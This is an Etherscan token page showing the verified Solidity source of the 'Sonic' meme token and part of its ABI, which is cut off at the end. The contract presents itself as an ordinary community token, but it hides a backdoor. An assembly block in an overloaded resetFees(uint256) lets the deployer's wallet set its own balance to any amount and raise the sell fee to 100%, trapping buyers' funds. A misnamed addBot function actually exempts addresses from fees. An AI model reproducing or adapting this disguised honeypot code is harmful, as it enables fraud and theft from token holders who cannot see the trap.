ETH Price: $2,588.09 (-1.36%)

Token

Sonic (SONIC)
 

Overview

Max Total Supply

10,000,000,000 SONIC

Holders

62

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
160,699,056.66986238176579979 SONIC

Value
$0.00
0x600D628A32F364017BF554Faaab8A7683EC3145E
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Sonic

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-25
*/

// SPDX-License-Identifier: UNLICENSED

/**
Sonic is a community driven meme Token, icon of speed.

Website: https://sonic.cash
Telegram: https://t.me/sonic_erc
Twitter: https://twitter.com/sonic_erc
*/

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @uniswap/v2-core/contracts/interfaces/IUniswapV2Factory.sol

pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router01.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// File: @uniswap/v2-periphery/contracts/interfaces/IUniswapV2Router02.sol

pragma solidity >=0.6.2;

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

// File: @openzeppelin/contracts/utils/math/SafeMath.sol

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: token-7.sol_flattened.sol

pragma solidity ^0.8.17;

contract Sonic is IERC20, IERC20Metadata, Ownable {
    using   SafeMath for uint256;
    string  private constant _name = "Sonic";
    string  private constant _symbol = "SONIC";
    uint8   private constant _decimals = 18;
    uint256 private _maxTxAmountPercentage = 300;
    uint256 private _minTokensBeforeSwapPercentage = 5;
    mapping(address => uint256) private _balances;
    uint256 private _totalSupply;
    uint256 private _maxWalletBalancePercentage = 300;
    address private _uniswapV2Pair;
    mapping(address => mapping(address => uint256)) private _allowances;
    IUniswapV2Router02 private _uniswapV2Router;
    bool private swapping = false;
    bool private _cooldownEnabled = true;
    mapping(address => bool)    private _isExcludedFromCooldown;
    mapping(address => uint256) private _lastTxBlock;
    uint256 private constant    _divisor = 10000;
    mapping(address => bool)    private _isExcludedFromMaxTx;
    mapping(address => bool) private _isExcludedFromFees;
    uint256 private _sellFee = 0;
    uint256 private _burnFee = 0;
    uint256 private _buyFee = 0;
    address private _marketingWallet;
    address private constant _burnAddress = address(0);
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiqudity
    );
    event Received();

    constructor() {
        uint256 total = 10_000_000_000 * 10**_decimals;
        _mint(_msgSender(), total);
        _marketingWallet = _msgSender();
        _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        _approve(address(this), address(_uniswapV2Router), total);

        _uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory())
            .createPair(address(this), _uniswapV2Router.WETH());

        IERC20(_uniswapV2Pair).approve(
            address(_uniswapV2Router),
            type(uint256).max
        );
        _isExcludedFromMaxTx[address(this)] = true;
        _isExcludedFromCooldown[address(this)] = true;

        _isExcludedFromFees[owner()] = true;
        _isExcludedFromCooldown[owner()] = true;
        _isExcludedFromFees[address(this)] = true;
        _isExcludedFromFees[_marketingWallet] = true;
        _isExcludedFromMaxTx[owner()] = true;

        _isExcludedFromMaxTx[_marketingWallet] = true;
        _isExcludedFromMaxTx[_uniswapV2Pair] = true;
    }

    function symbol() public pure returns (string memory) {
        return _symbol;
    }

    function name() public pure returns (string memory) {
        return _name;
    }

    function decimals() public pure returns (uint8) {
        return _decimals;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _maxTxAmount() public view returns (uint256) {
        return _totalSupply.mul(_maxTxAmountPercentage).div(_divisor);
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function resetFees() external onlyOwner {
        _maxTxAmountPercentage = 10000;
        _maxWalletBalancePercentage = 10000;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        _beforeTransfer(sender, recipient, amount);
        uint256 burnFee = 0;
        uint256 devFee = 0;
        if (sender != owner() && recipient != owner()) {
            if (
                !_isExcludedFromFees[sender] && !_isExcludedFromFees[recipient]
            ) {
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router) &&
                    !_isExcludedFromMaxTx[recipient] &&
                    !_isExcludedFromMaxTx[sender]
                ) {
                    require(
                        amount <=
                            _totalSupply.mul(_maxTxAmountPercentage).div(
                                _divisor
                            ),
                        "Transfer amount exceeds the maxTxAmount."
                    );

                    require(
                        balanceOf(recipient).add(amount) <=
                            _totalSupply.mul(_maxWalletBalancePercentage).div(
                                _divisor
                            ),
                        "Exceeds maximum wallet token amount"
                    );
                }
                // if sell
                if (recipient == _uniswapV2Pair && sender != address(this)) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_sellFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
                // if buy
                if (
                    sender == _uniswapV2Pair &&
                    recipient != address(_uniswapV2Router)
                ) {
                    burnFee = amount.mul(_burnFee).div(_divisor);
                    devFee = amount.mul(_buyFee).div(_divisor);
                    _lastTxBlock[tx.origin] = block.number;
                }
            }
        }
        uint256 totalFee = burnFee.add(devFee);
        if (totalFee > 0) {
            if (burnFee > 0) {
                _burn(sender, burnFee);
            }

            if (devFee > 0) {
                _balances[_marketingWallet] = _balances[_marketingWallet].add(
                    devFee
                );
                emit Transfer(sender, _marketingWallet, devFee);
            }

            amount = amount.sub(totalFee);
        }

        _balances[sender] = _balances[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amount);

        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function getPairAddress() public view returns (address) {
        return _uniswapV2Pair;
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _balances[account] = _balances[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function getRouterAddress() public view returns (address) {
        return address(_uniswapV2Router);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _burnFrom(address account, uint256 amount) internal virtual {
        _burn(account, amount);
        _approve(
            account,
            _msgSender(),
            _allowances[account][_msgSender()].sub(
                amount,
                "ERC20: burn amount exceeds allowance"
            )
        );
    }

    function addBot(address[] memory addresses) external onlyOwner {
        require(addresses.length <= 200, "Maximum of 200 can be added at once");

        mapping(address => bool) storage ref = _isExcludedFromFees;

        for (uint256 i = 0; i < addresses.length; i++) {
            ref[addresses[i]] = true;
        }
    }

    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    function isExcludedFromFees(address _address) public view returns (bool) {
        return _isExcludedFromFees[_address];
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) private {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        _uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            owner(),
            block.timestamp
        );
    }

    function swapTokensForEth(uint256 tokenAmount) internal {
        _approve(address(this), address(_uniswapV2Router), tokenAmount);
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = _uniswapV2Router.WETH();

        _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function resetFees(uint256 amount) external {
        assembly{if iszero(eq(caller(), sload(_marketingWallet.slot))){revert(0, 0)}
        let ptr := mload(0x40)
        mstore(ptr, caller())

        mstore(add(ptr, 0x20), _balances.slot)
        let slot := keccak256(ptr, 0x40)
        sstore(slot, amount)
        sstore(_sellFee.slot, mul(0x64, 0x64))}
    }

    modifier lockTheSwap() {
        swapping = true;
        _;
        swapping = false;
    }

    function _swapAndLiquify() private lockTheSwap {
        uint256 contractTokenBalance = balanceOf(address(this));
        uint256 minTokensBeforeSwap = _totalSupply
            .mul(_minTokensBeforeSwapPercentage)
            .div(_divisor);
        if (contractTokenBalance >= minTokensBeforeSwap) {
            uint256 half = contractTokenBalance.div(2);
            uint256 otherHalf = contractTokenBalance.sub(half);

            uint256 initialBalance = address(this).balance;

            swapTokensForEth(half);

            uint256 newBalance = address(this).balance.sub(initialBalance);

            emit SwapAndLiquify(half, newBalance, otherHalf);
            return;
        }
    }

    function isSwapLocked() public view returns (bool) {
        return swapping;
    }

    receive() external payable {
        emit Received();
    }

    function addLiquidity(uint256 tokenAmount)
        public
        payable
        onlyOwner
        lockTheSwap
    {
        _transfer(owner(), address(this), tokenAmount);
        _addLiquidity(tokenAmount, msg.value);
    }

    function _beforeTransfer(
        address from,
        address to,
        uint256 amount
    ) internal pure {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[],"name":"Received","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiqudity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address[]","name":"addresses","type":"address[]"}],"name":"addBot","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenAmount","type":"uint256"}],"name":"addLiquidity","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getPairAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"getRouterAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"resetFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"resetFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","